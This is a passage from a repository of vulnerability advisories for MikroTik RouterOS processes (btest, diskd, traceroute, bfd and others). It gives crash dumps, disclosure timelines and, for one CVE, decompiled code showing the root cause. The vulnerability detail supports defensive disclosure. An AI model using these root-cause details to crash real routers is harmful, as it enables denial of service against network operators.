CVE is assigned -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20214/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20214 2 | 3 | #### Description 4 | 5 | The `btest` process suffers from an assertion failure vulnerability. There is a reachable assertion in the `btest` process. By sending a crafted packet, an authenticated remote user can crash the `btest` process due to assertion failure. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGABRT, Aborted. 14 | => 0x7772255b : pop ebx 15 | 0x7772255c : cmp eax,0xfffff000 16 | 0x77722561 : jbe 0x77722571 17 | 0x77722563 : mov edx,DWORD PTR [ebx-0x34] 18 | 0x7772255b in raise () from target:/lib/libc.so.0 19 | (gdb) info inferiors 20 | Num Description Executable 21 | * 1 process 271 target:/nova/bin/btest 22 | ``` 23 | 24 | And the crash dump in `/rw/logs/backtrace.log` was: 25 | 26 | ```shell 27 | # cat /rw/logs/backtrace.log 28 | 2020.06.19-15:51:36.94@0: 29 | 2020.06.19-15:51:36.94@0: 30 | 2020.06.19-15:51:36.94@0: /nova/bin/btest 31 | 2020.06.19-15:51:36.94@0: --- signal=6 -------------------------------------------- 32 | 2020.06.19-15:51:36.94@0: 33 | 2020.06.19-15:51:36.94@0: eip=0x7772255b eflags=0x00000246 34 | 2020.06.19-15:51:36.94@0: edi=0x00fe0001 esi=0x7772a200 ebp=0x7fdcf880 esp=0x7fdcf878 35 | 2020.06.19-15:51:36.94@0: eax=0x00000000 ebx=0x0000010f ecx=0x0000010f edx=0x00000006 36 | 2020.06.19-15:51:36.94@0: 37 | 2020.06.19-15:51:36.94@0: maps: 38 | 2020.06.19-15:51:36.94@0: 08048000-08057000 r-xp 00000000 00:0c 1006 /nova/bin/btest 39 | 2020.06.19-15:51:36.94@0: 776f4000-77729000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 40 | 2020.06.19-15:51:36.94@0: 7772d000-77747000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 41 | 2020.06.19-15:51:36.94@0: 77748000-77757000 r-xp 00000000 00:0c 944 /lib/libuc++.so 42 | 2020.06.19-15:51:36.94@0: 77758000-77775000 r-xp 00000000 00:0c 947 /lib/libucrypto.so 43 | 2020.06.19-15:51:36.94@0: 77776000-777c2000 r-xp 00000000 00:0c 946 /lib/libumsg.so 44 | 2020.06.19-15:51:36.94@0: 777c8000-777cf000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 45 | 2020.06.19-15:51:36.94@0: 46 | 2020.06.19-15:51:36.94@0: stack: 0x7fdd0000 - 0x7fdcf878 47 | 2020.06.19-15:51:36.94@0: 00 a0 72 77 00 a0 72 77 b8 f8 dc 7f 77 e0 71 77 06 00 00 00 00 a2 72 77 20 00 00 00 00 00 00 00 48 | 2020.06.19-15:51:36.94@0: 16 00 00 00 18 f9 dc 7f b4 f8 dc 7f e4 2a 7c 77 01 00 00 00 e4 2a 7c 77 16 00 00 00 01 00 fe 00 49 | 2020.06.19-15:51:36.94@0: 50 | 2020.06.19-15:51:36.94@0: code: 0x7772255b 51 | 2020.06.19-15:51:36.94@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8 52 | ``` 53 | 54 | #### Affected Version 55 | 56 | This vulnerability was initially found in long-term `6.44.5`, and it seems that the latest stable version `6.48.2` still suffers from this vulnerability. 57 | 58 | #### Timeline 59 | 60 | + 2019/10/21 - report the vulnerability to the vendor 61 | + 2019/10/21 - vendor confirms the vulnerability and will fix it as soon as possible 62 | + 2020/06/02 - still no fix yet 63 | + 2021/05/04 - CVE is assigned -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20215/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20215 2 | 3 | #### Description 4 | 5 | The `diskd` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `diskd` process due to invalid memory access. 6 | 7 | Against stable `6.46.3`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGSEGV, Segmentation fault. 14 | => 0x776cd1db <_ZN6string6assignERKS_+21>: mov eax,DWORD PTR [eax] 15 | 0x776cd1dd <_ZN6string6assignERKS_+23>: mov edx,DWORD PTR [eax] 16 | 0x776cd1df <_ZN6string6assignERKS_+25>: add edx,eax 17 | 0x776cd1e1 <_ZN6string6assignERKS_+27>: add edx,0x4 18 | 0x776cd1db in string::assign(string const&) () from target:/lib/libuc++.so 19 | (gdb) i r 20 | eax 0x1b 27 21 | ecx 0x776d54ec 2003653868 22 | edx 0x20fe0010 553517072 23 | ebx 0x776d54ec 2003653868 24 | esp 0x7fd40b6c 0x7fd40b6c 25 | ebp 0x7fd40b78 0x7fd40b78 26 | esi 0x8056790 134571920 27 | edi 0x8056760 134571872 28 | eip 0x776cd1db 0x776cd1db 29 | eflags 0x10202 [ IF RF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 264 target:/nova/bin/diskd 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.06.04-14:18:22.55@0: 46 | 2020.06.04-14:18:22.55@0: 47 | 2020.06.04-14:18:22.55@0: /nova/bin/diskd 48 | 2020.06.04-14:18:22.55@0: --- signal=11 -------------------------------------------- 49 | 2020.06.04-14:18:22.55@0: 50 | 2020.06.04-14:18:22.55@0: eip=0x776cd1db eflags=0x00010202 51 | 2020.06.04-14:18:22.55@0: edi=0x08056760 esi=0x08056790 ebp=0x7fd40b78 esp=0x7fd40b6c 52 | 2020.06.04-14:18:22.55@0: eax=0x0000001b ebx=0x776d54ec ecx=0x776d54ec edx=0x20fe0010 53 | 2020.06.04-14:18:22.55@0: 54 | 2020.06.04-14:18:22.55@0: maps: 55 | 2020.06.04-14:18:22.55@0: 08048000-08052000 r-xp 00000000 00:0c 1131 /nova/bin/diskd 56 | 2020.06.04-14:18:22.55@0: 77672000-776a7000 r-xp 00000000 00:0c 996 /lib/libuClibc-0.9.33.2.so 57 | 2020.06.04-14:18:22.55@0: 776ab000-776c5000 r-xp 00000000 00:0c 992 /lib/libgcc_s.so.1 58 | 2020.06.04-14:18:22.55@0: 776c6000-776d5000 r-xp 00000000 00:0c 976 /lib/libuc++.so 59 | 2020.06.04-14:18:22.55@0: 776d6000-776de000 r-xp 00000000 00:0c 982 /lib/libubox.so 60 | 2020.06.04-14:18:22.55@0: 776df000-7772b000 r-xp 00000000 00:0c 978 /lib/libumsg.so 61 | 2020.06.04-14:18:22.55@0: 77731000-77738000 r-xp 00000000 00:0c 990 /lib/ld-uClibc-0.9.33.2.so 62 | 2020.06.04-14:18:22.55@0: 63 | 2020.06.04-14:18:22.55@0: stack: 0x7fd41000 - 0x7fd40b6c 64 | 2020.06.04-14:18:22.55@0: ec 54 6d 77 1b 00 00 00 88 67 05 08 98 0b d4 7f c6 c6 04 08 88 67 05 08 1b 00 00 00 10 00 fe 20 65 | 2020.06.04-14:18:22.55@0: 10 00 fe 20 ec 54 6d 77 f0 ea 6d 77 08 0c d4 7f 6d a9 6d 77 88 67 05 08 1b 00 00 00 05 00 00 00 66 | 2020.06.04-14:18:22.55@0: 67 | 2020.06.04-14:18:22.55@0: code: 0x776cd1db 68 | 2020.06.04-14:18:22.55@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75 69 | ``` 70 | 71 | #### Affected Version 72 | 73 | This vulnerability was initially found in long-term `6.44.5`, and was fixed in stable `6.47`. 74 | 75 | #### Timeline 76 | 77 | + 2019/10/21 - report the vulnerability to the vendor 78 | + 2019/10/21 - vendor confirms the vulnerability and will fix it as soon as possible 79 | + 2020/06/02 - vendor fix it in stable `6.47` 80 | + 2021/05/04 - CVE is assigned 81 | 82 | 83 | 84 | 85 | 86 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20216/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20216 2 | 3 | #### Description 4 | 5 | The `graphing` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `graphing` process due to NULL pointer dereference. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGSEGV, Segmentation fault. 14 | => 0x80521e2: call DWORD PTR [ecx+0x4] 15 | 0x80521e5: add esp,0x18 16 | 0x80521e8: push 0x5c 17 | 0x80521ea: push ebx 18 | 0x080521e2 in ?? () 19 | (gdb) i r 20 | eax 0x8061db8 134618552 21 | ecx 0x0 0 22 | edx 0x8061ce8 134618344 23 | ebx 0x7fa8ad0c 2141760780 24 | esp 0x7fa8acb0 0x7fa8acb0 25 | ebp 0x7fa8acd8 0x7fa8acd8 26 | esi 0x8061cb8 134618296 27 | edi 0x80610a0 134615200 28 | eip 0x80521e2 0x80521e2 29 | eflags 0x10202 [ IF RF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 196 target:/nova/bin/graphing 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.06.04-15:12:41.47@0: 46 | 2020.06.04-15:12:41.47@0: 47 | 2020.06.04-15:12:41.47@0: /nova/bin/graphing 48 | 2020.06.04-15:12:41.47@0: --- signal=11 -------------------------------------------- 49 | 2020.06.04-15:12:41.47@0: 50 | 2020.06.04-15:12:41.47@0: eip=0x080521e2 eflags=0x00010202 51 | 2020.06.04-15:12:41.47@0: edi=0x080610a0 esi=0x08061cb8 ebp=0x7fa8acd8 esp=0x7fa8acb0 52 | 2020.06.04-15:12:41.47@0: eax=0x08061db8 ebx=0x7fa8ad0c ecx=0x00000000 edx=0x08061ce8 53 | 2020.06.04-15:12:41.47@0: 54 | 2020.06.04-15:12:41.47@0: maps: 55 | 2020.06.04-15:12:41.47@0: 08048000-0805c000 r-xp 00000000 00:0c 1038 /nova/bin/graphing 56 | 2020.06.04-15:12:41.47@0: 77651000-77686000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 57 | 2020.06.04-15:12:41.47@0: 7768a000-776a4000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 58 | 2020.06.04-15:12:41.47@0: 776a5000-776b4000 r-xp 00000000 00:0c 944 /lib/libuc++.so 59 | 2020.06.04-15:12:41.47@0: 776b5000-776bd000 r-xp 00000000 00:0c 950 /lib/libubox.so 60 | 2020.06.04-15:12:41.47@0: 776be000-7770a000 r-xp 00000000 00:0c 946 /lib/libumsg.so 61 | 2020.06.04-15:12:41.47@0: 7770d000-77717000 r-xp 00000000 00:0c 961 /lib/libm-0.9.33.2.so 62 | 2020.06.04-15:12:41.47@0: 7771c000-77723000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 63 | 2020.06.04-15:12:41.47@0: 64 | 2020.06.04-15:12:41.47@0: stack: 0x7fa8b000 - 0x7fa8acb0 65 | 2020.06.04-15:12:41.47@0: e8 1c 06 08 b8 1d 06 08 00 00 00 00 01 00 00 00 0c ad a8 7f 5b 00 00 00 b8 98 05 08 b8 98 05 08 66 | 2020.06.04-15:12:41.47@0: f0 da 6b 77 0c ad a8 7f 28 ad a8 7f 3a bc 6b 77 b8 1c 06 08 0c ad a8 7f 05 00 00 00 a0 10 06 08 67 | 2020.06.04-15:12:41.47@0: 68 | 2020.06.04-15:12:41.47@0: code: 0x80521e2 69 | 2020.06.04-15:12:41.47@0: ff 51 04 83 c4 18 6a 5c 53 e8 a0 9c ff ff 8b 56 70 | ``` 71 | 72 | #### Affected Version 73 | 74 | This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`. 75 | 76 | #### Timeline 77 | 78 | + 2019/12/02 - report the vulnerability to the vendor 79 | + 2020/06/02 - vendor fix it in stable `6.47` 80 | + 2021/05/04 - CVE is assigned 81 | 82 | 83 | 84 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20217/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20217 2 | 3 | #### Description 4 | 5 | The `route` process suffers from an uncontrolled resource consumption vulnerability. By sending a crafted packet, an authenticated remote user can cause a high cpu load, which may make the device respond slowly or unable to respond. 6 | 7 | Against stable `6.46.3`, the poc resulted in the high cpu load on the device. 8 | 9 | ![route_high_cpu_load](./images/route_high_cpu_load.png) 10 | 11 | #### Affected Version 12 | 13 | This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`. 14 | 15 | #### Timeline 16 | 17 | + 2019/12/02 - reported the vulnerability to the vendor 18 | + 2019/12/03 - vendor reproduced and confirmed the vulnerability 19 | + 2021/05/04 - CVE was assigned 20 | 21 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20217/images/route_high_cpu_load.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/advisory/MikroTik/CVE-2020-20217/images/route_high_cpu_load.png -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20218/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20218 2 | 3 | #### Description 4 | 5 | The `traceroute` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `traceroute` process, for the count of loop operation is controllable. 6 | 7 | Against stable `6.46.3`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGSEGV, Segmentation fault. 14 | => 0x804da3e: rep stos BYTE PTR es:[edi],al 15 | 0x804da40: jne 0x804da81 16 | 0x804da42: mov eax,DWORD PTR [ebx+0x50] 17 | 0x804da45: mov ecx,DWORD PTR [ebx+0x4] 18 | 0x0804da3e in ?? () 19 | (gdb) i r 20 | eax 0x0 0 21 | ecx 0xfdffd1 16646097 <=== controllable 22 | edx 0x7e9df530 2124281136 23 | ebx 0x8052848 134555720 24 | esp 0x7e9df530 0x7e9df530 25 | ebp 0x7f9bf5c8 0x7f9bf5c8 26 | esi 0x7e9df538 2124281144 27 | edi 0x7e9df538 2124281144 28 | eip 0x804da3e 0x804da3e 29 | eflags 0x10297 [ CF PF AF SF IF RF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 455 target:/nova/bin/traceroute 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.05.16-21:51:49.43@0: 46 | 2020.05.16-21:51:49.43@0: 47 | 2020.05.16-21:51:49.43@0: /nova/bin/traceroute 48 | 2020.05.16-21:51:49.43@0: --- signal=11 -------------------------------------------- 49 | 2020.05.16-21:51:49.43@0: 50 | 2020.05.16-21:51:49.43@0: eip=0x0804da3e eflags=0x00010297 51 | 2020.05.16-21:51:49.43@0: edi=0x7e9df538 esi=0x7e9df538 ebp=0x7f9bf5c8 esp=0x7e9df530 52 | 2020.05.16-21:51:49.43@0: eax=0x00000000 ebx=0x08052848 ecx=0x00fdffd1 edx=0x7e9df530 53 | 2020.05.16-21:51:49.43@0: 54 | 2020.05.16-21:51:49.43@0: maps: 55 | 2020.05.16-21:51:49.43@0: 08048000-0804f000 r-xp 00000000 00:0c 1007 /nova/bin/traceroute 56 | 2020.05.16-21:51:49.43@0: 77705000-7773a000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 57 | 2020.05.16-21:51:49.43@0: 7773e000-77758000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 58 | 2020.05.16-21:51:49.43@0: 77759000-77768000 r-xp 00000000 00:0c 944 /lib/libuc++.so 59 | 2020.05.16-21:51:49.43@0: 77769000-77773000 r-xp 00000000 00:0c 961 /lib/libm-0.9.33.2.so 60 | 2020.05.16-21:51:49.43@0: 77775000-777c1000 r-xp 00000000 00:0c 946 /lib/libumsg.so 61 | 2020.05.16-21:51:49.43@0: 777c7000-777ce000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 62 | 2020.05.16-21:51:49.43@0: 63 | 2020.05.16-21:51:49.43@0: stack: 0x7f9c0000 - 0x7e9df530 64 | ``` 65 | 66 | #### Details 67 | 68 | The vulnerability can be triggered by sending a nova message to the default handler. In its default handler vtable, the default `nv::Handler::handleCmd()` is overwritten by `sub_804C820()`. 69 | 70 | In `sub_804C820()`, if `a3` equals to `0xfe000f`, then the value of u32_id `5` will be read and saved at `(2)`. At `(3)`, there is a signed comparison. If it satisfy, in normal cases the routine will reach `(4)`, where `sub_804D892()` will be called. 71 | 72 | ```c++ 73 | // file: /nova/bin/traceroute in stable 6.46.3 74 | int sub_804C820(nv::Looper *a1, nv::message *a2, unsigned int a3) 75 | { 76 | if ( a3 == 0xFE000F ) // (1) command id 77 | { 78 | /* ... */ 79 | v3[19] = -1; 80 | v3[20] = 0; 81 | v3[21] = -1; 82 | /* ... */ 83 | v3[19] = nv::message::get(a2, 15, v3[19]); 84 | v12 = nv::message::get(a2, 16, v3[21]); 85 | v3[21] = v12; 86 | if ( !v3[3] ) 87 | v3[12] = 0; 88 | if ( nv::message::get(a2, 5, v12, v12) ) 89 | { 90 | v13 = IPAddr6::isIPv4(v28); 91 | if ( (_BYTE)v13 ) 92 | v14 = nv::message::get(a2, 5, v13, v13) - 20; 93 | else 94 | v14 = nv::message::get(a2, 5, v13, v13) - 40; 95 | v3[15] = v14; // (2) [v3 + 0x3C] = v18 96 | } 97 | if ( v3[15] > 7 ) // (3) signed comparison 98 | { 99 | if ( v3[19] ) 100 | { 101 | v15 = v3[21]; 102 | if ( v15 ) 103 | { 104 | /* ... */ 105 | if ( v3[2] >= 0 ) 106 | { 107 | /* ... */ 108 | sub_804D892((int)v3); // (4) 109 | /* ... */ 110 | 111 | ``` 112 | 113 | In `sub_804D892()`, the value saved at `a1 + 0x3c` will be read and assigned to `v11` at `(5)`. Exactly, this value is the previous value read from nova message, and controllable. At `(6)` `v11` will be passed to `alloca()` for stack space allocation. Since there is lack of proper validation on this value, if we provide a big value, we can cause the stack overlapping with library memory at `(6)`. Later when calling `memset()`, invalid memory access would occur. 114 | 115 | ```c++ 116 | void sub_804D892(int a1) 117 | { 118 | /* ... */ 119 | v11 = *(_DWORD *)(a1 + 0x3C); // (5) 120 | v12 = alloca(v11); // (6) controllable stack space allocation 121 | v13 = *(_DWORD *)(a1 + 12) == 1; 122 | memset(&v33, 0, v11 - 8); // (7) &v33=v12+8 123 | /* ... */ 124 | ``` 125 | 126 | #### Affected Version 127 | 128 | This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.46.5` . 129 | 130 | #### Timeline 131 | 132 | + 2020/01/06 - report the vulnerability to the vendor 133 | + 2020/01/08 - vendor confirms the vulnerability and fix it in Testing release tree 134 | + 2020/04/08 - vendor fix it in stable `6.46.5` 135 | + 2021/05/04 - CVE is assigned -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20219/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20219 2 | 3 | #### Description 4 | 5 | The `igmpproxy` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `igmpproxy` process due to NULL pointer dereference. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGSEGV, Segmentation fault. 14 | => 0x8050a8d: mov eax,DWORD PTR [ebx] 15 | 0x8050a8f: push DWORD PTR [eax] 16 | 0x8050a91: push 0x1 17 | 0x8050a93: push esi 18 | 0x08050a8d in ?? () 19 | (gdb) i r 20 | eax 0x80581bc 134578620 21 | ecx 0xb 11 22 | edx 0x0 0 23 | ebx 0x0 0 24 | esp 0x7fa9326c 0x7fa9326c 25 | ebp 0x7fa932a8 0x7fa932a8 26 | esi 0x7fa932b8 2141795000 27 | edi 0x7fa9331c 2141795100 28 | eip 0x8050a8d 0x8050a8d 29 | eflags 0x10206 [ PF IF RF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 237 target:/ram/pckg/multicast/nova/bin/igmpproxy 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.06.04-17:44:27.12@0: 46 | 2020.06.04-17:44:27.12@0: 47 | 2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy 48 | 2020.06.04-17:44:27.12@0: --- signal=11 -------------------------------------------- 49 | 2020.06.04-17:44:27.12@0: 50 | 2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206 51 | 2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8 ebp=0x7fa932a8 esp=0x7fa9326c 52 | 2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x00000000 ecx=0x0000000b edx=0x00000000 53 | 2020.06.04-17:44:27.12@0: 54 | 2020.06.04-17:44:27.12@0: maps: 55 | 2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp 00000000 00:13 16 /ram/pckg/multicast/nova/bin/igmpproxy 56 | 2020.06.04-17:44:27.12@0: 7770b000-77740000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 57 | 2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 58 | 2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp 00000000 00:0c 944 /lib/libuc++.so 59 | 2020.06.04-17:44:27.12@0: 7776f000-77777000 r-xp 00000000 00:0c 950 /lib/libubox.so 60 | 2020.06.04-17:44:27.12@0: 77778000-777c4000 r-xp 00000000 00:0c 946 /lib/libumsg.so 61 | 2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 62 | 2020.06.04-17:44:27.12@0: 63 | 2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c 64 | 2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32 a9 7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f 65 | 2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32 a9 7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f 66 | 2020.06.04-17:44:27.12@0: 67 | 2020.06.04-17:44:27.12@0: code: 0x8050a8d 68 | 2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4 0c 0f 69 | ``` 70 | 71 | #### Affected Version 72 | 73 | This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`. 74 | 75 | #### Timeline 76 | 77 | + 2020/01/06 - report the vulnerability to the vendor 78 | + 2020/06/02 - vendor fix it in stable `6.47` 79 | + 2021/05/04 - CVE is assigned -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20220/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20220 2 | 3 | #### Description 4 | 5 | The `bfd` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `bfd` process due to invalid memory access. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | Thread 2.1 "bfd" received signal SIGSEGV, Segmentation fault. 11 | => 0x804b175: inc DWORD PTR ds:0x0 12 | 0x804b17b: add esp,0x10 13 | 0x804b17e: leave 14 | 0x804b17f: ret 15 | 0x0804b175 in ?? () 16 | (gdb) i r 17 | eax 0x8050634 134546996 18 | ecx 0x8051274 134550132 19 | edx 0x1 1 20 | ebx 0x77777af0 2004318960 21 | esp 0x7f9d3e70 0x7f9d3e70 22 | ebp 0x7f9d3e88 0x7f9d3e88 23 | esi 0x8054298 134562456 24 | edi 0x8054a90 134564496 25 | eip 0x804b175 0x804b175 26 | eflags 0x10202 [ IF RF ] 27 | cs 0x73 115 28 | ss 0x7b 123 29 | ds 0x7b 123 30 | es 0x7b 123 31 | fs 0x0 0 32 | gs 0x33 51 33 | (gdb) info inferiors 34 | Num Description Executable 35 | 1 target:/ram/pckg/routing/nova/bin/bfd 36 | * 2 process 306 target:/ram/pckg/routing/nova/bin/bfd 37 | ``` 38 | 39 | And the crash dump in `/rw/logs/backtrace.log` was: 40 | 41 | ```shell 42 | # cat /rw/logs/backtrace.log 43 | 2020.06.19-18:36:13.88@0: 44 | 2020.06.19-18:36:13.88@0: 45 | 2020.06.19-18:36:13.88@0: /ram/pckg/routing/nova/bin/bfd 46 | 2020.06.19-18:36:13.88@0: --- signal=11 -------------------------------------------- 47 | 2020.06.19-18:36:13.88@0: 48 | 2020.06.19-18:36:13.88@0: eip=0x0804b175 eflags=0x00010202 49 | 2020.06.19-18:36:13.88@0: edi=0x08054a90 esi=0x08054298 ebp=0x7f9d3e88 esp=0x7f9d3e70 50 | 2020.06.19-18:36:13.88@0: eax=0x08050634 ebx=0x77777af0 ecx=0x08051274 edx=0x00000001 51 | 2020.06.19-18:36:13.88@0: 52 | 2020.06.19-18:36:13.88@0: maps: 53 | 2020.06.19-18:36:13.88@0: 08048000-08050000 r-xp 00000000 00:1b 16 /ram/pckg/routing/nova/bin/bfd 54 | 2020.06.19-18:36:13.88@0: 7759a000-7759c000 r-xp 00000000 00:0c 959 /lib/libdl-0.9.33.2.so 55 | 2020.06.19-18:36:13.88@0: 7759e000-775d3000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 56 | 2020.06.19-18:36:13.88@0: 775d7000-775f1000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 57 | 2020.06.19-18:36:13.88@0: 775f2000-77601000 r-xp 00000000 00:0c 944 /lib/libuc++.so 58 | 2020.06.19-18:36:13.88@0: 77602000-7775f000 r-xp 00000000 00:0c 954 /lib/libcrypto.so.1.0.0 59 | 2020.06.19-18:36:13.88@0: 7776f000-77777000 r-xp 00000000 00:0c 950 /lib/libubox.so 60 | 2020.06.19-18:36:13.88@0: 77778000-777c4000 r-xp 00000000 00:0c 946 /lib/libumsg.so 61 | 2020.06.19-18:36:13.88@0: 777ca000-777d1000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 62 | 2020.06.19-18:36:13.88@0: 63 | 2020.06.19-18:36:13.88@0: stack: 0x7f9d4000 - 0x7f9d3e70 64 | 2020.06.19-18:36:13.88@0: 34 06 05 08 d0 e6 04 08 d8 3e 9d 7f 90 4a 05 08 98 42 05 08 d8 3e 9d 7f f8 3e 9d 7f 6d 39 77 77 65 | 2020.06.19-18:36:13.88@0: 90 4a 05 08 28 40 9d 7f 05 00 00 00 00 43 05 08 00 00 00 00 28 90 7c 77 01 00 00 00 0c 00 00 00 66 | 2020.06.19-18:36:13.88@0: 67 | 2020.06.19-18:36:13.88@0: code: 0x804b175 68 | 2020.06.19-18:36:13.88@0: ff 05 00 00 00 00 83 c4 10 c9 c3 55 89 e5 53 83 69 | ``` 70 | 71 | #### Affected Version 72 | 73 | This vulnerability was initially found in long-term `6.44.6`, and it seems that the latest stable version `6.48.2` still suffer from this vulnerability. 74 | 75 | #### Timeline 76 | 77 | + 2020/01/06 - report the vulnerability to the vendor 78 | + 2020/01/07 - vendor confirms the vulnerability and will work on a fix 79 | + 2021/05/04 - CVE is assigned 80 | 81 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20221/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20221 2 | 3 | #### Description 4 | 5 | The `cerm` process suffers from an uncontrolled resource consumption vulnerability. By sending a crafted packet, an authenticated remote user can cause a high cpu load, which may make the device respond slowly or unable to respond. 6 | 7 | Against long-term `6.45.8`, the poc resulted in the high cpu load on the device. 8 | 9 | ![cerm_high_cpu_load](./images/cerm_high_cpu_load.png) 10 | 11 | #### Affected Version 12 | 13 | This vulnerability was initially found in long-term `6.44.6`, and was fixed since stable `6.46` . 14 | 15 | #### Timeline 16 | 17 | + 2020/01/06 - report the vulnerability to the vendor 18 | + 2020/01/08 - vendor confirms the vulnerability and fix it since stable `6.46` 19 | + 2021/05/04 - CVE is assigned -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20221/images/cerm_high_cpu_load.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/advisory/MikroTik/CVE-2020-20221/images/cerm_high_cpu_load.png -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20222/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20222 2 | 3 | #### Description 4 | 5 | The `sniffer` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `sniffer` process due to NULL pointer dereference. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 